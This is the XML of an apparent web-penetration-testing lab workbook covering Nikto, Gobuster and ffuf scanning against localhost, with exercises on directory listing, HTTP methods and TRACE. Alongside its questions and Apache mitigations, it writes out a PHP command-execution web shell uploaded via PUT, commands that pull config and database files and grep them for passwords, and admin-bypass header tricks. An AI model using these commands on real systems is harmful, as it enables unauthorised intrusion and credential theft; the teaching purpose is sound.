    <w:p w14:paraId="3074C28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PHP/7.4.3 appears to be installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A57DAC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/phpinfo.php: This might be interesting...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677122C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/config.php: Configuration file found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4F998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/login.php: Login page found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC2F36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Apache is vulnerable to CVE-XXXX-XXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04011C14"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2: Parse Scan Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399ED454"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lastRenderedPageBreak/>
        <w:t>Review the HTML report (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nikto_report.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4462AD" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Identified vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638A3740" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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CVE references</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48767920" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Severity levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0411A987" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Suggested remediations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A15EE9"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Questions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC2D355" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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2.1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> List all vulnerabilities found. Which are critical?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263230AF" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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2.2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> What does the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/config.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> exposure indicate?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E826404" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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2.3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Are default files or test pages exposed? Explain the risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B43E15F"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3: Targeted Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1629ACF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Scan specific port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DE379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nikto -h http://localhost:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0307288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AA448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Skip certain tests (faster)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5314544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nikto -h http://localhost -Tuning x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF0FE3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55F54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Aggressive testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AE6D9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nikto -h http://localhost -Tuning 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AF35C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AF4A7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Custom User-Agent (evasion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C9A1E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nikto -h http://localhost -useragent "Mozilla/5.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60543A5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4EC9E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Save to multiple formats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA4D33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nikto -h http://localhost -output nikto_report.csv -f csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D481AE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nikto -h http://localhost -output nikto_report.json -f json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323D1105"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4: Exploit Vulnerable Misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC2C561"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If Nikto identifies exploitable issues:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1B0EE7"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2.4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> If Nikto found a writable directory or file upload vulnerability, how would you exploit it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1786B6"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Example (Conceptual):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> If </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/uploads/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is writable and executable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0097E94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Create test payload (do not execute without authorization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDE327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echo "&lt;?php phpinfo(); ?&gt;" &gt; shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D431D5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Upload via vulnerable form or directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C90ED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-X PUT http://localhost/uploads/shell.php -d @shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564BE49D" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00885E3F" w:rsidP="00D9219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885E3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="4607B2CF">
          <v:rect id="_x0000_i1029" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="388E3AF2" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ACTIVITY 3: DIRECTORY BRUTE-FORCING WITH GOBUSTER &amp; DRBUSTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43781C92"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Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Discover hidden directories and files on web servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ECF1E4"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Time:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 60 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A08A467"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lastRenderedPageBreak/>
        <w:t>Difficulty:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Intermediate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2897BE8A"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1: Gobuster Basic Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607573A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Standard directory enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E3688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gobuster dir -u http://localhost/ -w /usr/share/wordlists/dirb/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732DAAC1"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FC924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With file extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29851B8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gobuster dir -u http://localhost/ -w /usr/share/wordlists/dirb/common.txt -x php,html,txt,backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727E643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D8293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Verbose output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B2E21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gobuster dir -u http://localhost/ -w /usr/share/wordlists/dirb/common.txt -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6998CA4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95B10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Larger wordlist (more thorough but slower)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB65D8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gobuster dir -u http://localhost/ -w /usr/share/wordlists/dirb/big.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412EA5B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9719D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Threads (faster scanning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C7433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gobuster dir -u http://localhost/ -w /usr/share/wordlists/dirb/common.txt -t 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776992D4"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2: Analyze Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2832BBAA"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Expected Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D56364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/admin (Status: 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6E4E77"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/config.php (Status: 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C4F5E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/login.php (Status: 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601BAF5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/test (Status: 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2122441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/.htaccess (Status: 403)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9B1BF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/.git (Status: 403)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8DBFD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/backup (Status: 301)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38061392"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Questions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2987CD" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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3.1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> What directories are discovered? Which are sensitive?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404BB36A" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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3.2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> What do 403 responses indicate? Why not delete them?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332ED196" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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3.3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Is there a backup directory? What might it contain?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262B266F"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3: Subdomain Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606E39F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VHOST enumeration (find subdomains)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB31AD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gobuster vhost -u http://example.com/ -w /usr/share/wordlists/subdomains.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151A717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7FD2B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DNS enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC2E927"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gobuster dns -d example.com -w /usr/share/wordlists/subdomains.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C776BFE"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4: FFuF Advanced Fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C76954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Basic directory fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4908B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ffuf -u http://localhost/FUZZ -w /usr/share/wordlists/dirb/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DFA14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3C04D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Filter by status code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6792FF07"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lastRenderedPageBreak/>
        <w:t>ffuf -u http://localhost/FUZZ -w /usr/share/wordlists/dirb/common.txt -fc 404</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4E959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CDD13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Combine with extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DF30F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ffuf -u http://localhost/FUZZ.php -w /usr/share/wordlists/dirb/common.txt -mc 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61678B9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6206D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Parameter fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ADB67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ffuf -u http://localhost/admin.php?FUZZ=test -w /usr/share/wordlists/paramnames.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3E6BF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C1CAE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Match size (avoid false positives)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34922C1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ffuf -u http://localhost/FUZZ -w wordlist.txt -ms 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B2CB04"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5: Analyze Sensitive Discoveries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74235608"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If sensitive paths are found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA85B3C"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3.4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> If </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is discovered and accessible without authentication, what exploits are possible?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C0B6AE"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Example Analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372D1FA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Test if /admin requires authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59243FF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-v http://localhost/admin/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB752C1"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EE966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If it redirects to login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110C8A3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-L http://localhost/admin/  # Follow redirects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291E4A0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0B9CC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Try common bypass techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8B5AA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-H "X-Original-URL: /admin/" http://localhost/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F20E3D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-H "X-Rewrite-URL: /admin/" http://localhost/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD1E45C" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00885E3F" w:rsidP="00D9219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885E3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="3063921B">
          <v:rect id="_x0000_i1030" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E325FCE" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ACTIVITY 4: WEB SERVER MISCONFIGURATIONS EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D925F7D"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Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identify and exploit common web server misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23662FC7"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Time:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 90 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2243B864"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Difficulty:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Intermediate to Advanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0598AA"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1: Directory Listing Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BE7E69"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Identify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6704550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If /backup/ returns directory listing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3E503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http://localhost/backup/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9959E6"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Expected Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1AC4A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&lt;html&gt;&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F78E31"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lastRenderedPageBreak/>
        <w:t>&lt;a href="config.php"&gt;config.php&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2416BEE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&lt;a href="database.sql"&gt;database.sql&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A55F6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&lt;/body&gt;&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E48FB6F"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Exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E29A1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Download exposed files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603DD96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wget http://localhost/backup/config.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCAA3C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wget http://localhost/backup/database.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF9F53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4021D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Examine for credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5FAC37"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grep -i "password\|db\|secret" config.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435EBC22"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Mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24642B7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Apache: Disable directory listing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E40FC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&lt;Directory /var/www/html/backup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153F25A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Options -Indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329567D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&lt;/Directory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BE797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462DC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Create index.html or index.php as decoy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5556446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echo "Forbidden" &gt; /var/www/html/backup/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698B87A6"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4.1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> What information was exposed? How could it compromise the application?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DFCFC9"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2: Test HTTP Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D331BC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Check allowed methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBC6467"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-X OPTIONS http://localhost/ -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02647A1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AD9B4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Try PUT (upload files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162BC0F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-X PUT http://localhost/test.txt -d "malicious content"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279705C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C627D1"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Try DELETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F26C6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-X DELETE http://localhost/test.txt -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36297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E2EB2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Check if WebDAV is enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E649807"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-X PROPFIND http://localhost/ -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6429225A"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If PUT succeeds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1917C06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Upload PHP shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3DAE0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echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt; shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C49FE4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-X PUT http://localhost/shell.php --data-binary @shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAC214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84E7C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Execute command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BC681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"http://localhost/shell.php?cmd=id"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF1963E"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Mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051D8D3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Apache: Disable dangerous methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BFFFE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&lt;Directory /var/www/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CA0BB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&lt;LimitExcept GET POST HEAD&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2330B63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deny from all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECC099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&lt;/LimitExcept&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1497DD7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&lt;/Directory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2118C7C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B4B5B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lastRenderedPageBreak/>
        <w:t># Disable TRACE method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AC35E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TraceEnable Off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9D9605"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4.2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> What methods should be enabled? Why is PUT dangerous?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A911E40"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3: TRACE Method (XST Attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C424E5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Test if TRACE is enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C38E2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-X TRACE http://localhost/ -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273183BA"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If successful (vulnerable):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31973F5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HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
